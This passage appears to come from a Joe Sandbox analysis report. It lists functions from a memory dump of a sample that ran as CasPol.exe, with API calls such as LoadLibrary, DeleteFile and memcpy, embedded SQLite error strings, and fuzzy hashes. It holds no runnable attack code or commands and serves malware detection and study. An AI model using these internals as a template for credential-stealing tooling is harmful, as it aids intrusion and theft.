                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 290601579-0
                                                                                                                  • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                  • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                                  • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                  • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                  • String ID: %s (%s)$YV@
                                                                                                                  • API String ID: 3979103747-598926743
                                                                                                                  • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                  • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                  • API String ID: 2780580303-317687271
                                                                                                                  • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                  • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                  • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                  • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                  • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                  • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                  • API String ID: 2767993716-572158859
                                                                                                                  • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                  • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                  • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                  • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • out of memory, xrefs: 0042F865
                                                                                                                  • database is already attached, xrefs: 0042F721
                                                                                                                  • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                  • unable to open database: %s, xrefs: 0042F84E
                                                                                                                  • database %s is already in use, xrefs: 0042F6C5
                                                                                                                  • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                  • API String ID: 1297977491-2001300268
                                                                                                                  • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                  • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                  APIs
                                                                                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3015003838-0
                                                                                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                  • free.MSVCRT ref: 004185AC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2802642348-0
                                                                                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                  • String ID: strings
                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D8BD
                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                  • memset.MSVCRT ref: 0040D906
                                                                                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                  • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                  • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                  • memset.MSVCRT ref: 0041BA3D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: -journal$-wal
                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                  • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                  • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                  APIs
                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                  • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4218492932-0
                                                                                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                  • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                  • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                  • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 438689982-4203073231
                                                                                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                  • memset.MSVCRT ref: 00405455
                                                                                                                  • memset.MSVCRT ref: 0040546C
                                                                                                                  • memset.MSVCRT ref: 00405483
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy$ErrorLast
                                                                                                                  • String ID: 6$\
                                                                                                                  • API String ID: 404372293-1284684873
                                                                                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                  • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                  • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1331804452-0
                                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: advapi32.dll
                                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                                  • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                  • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf
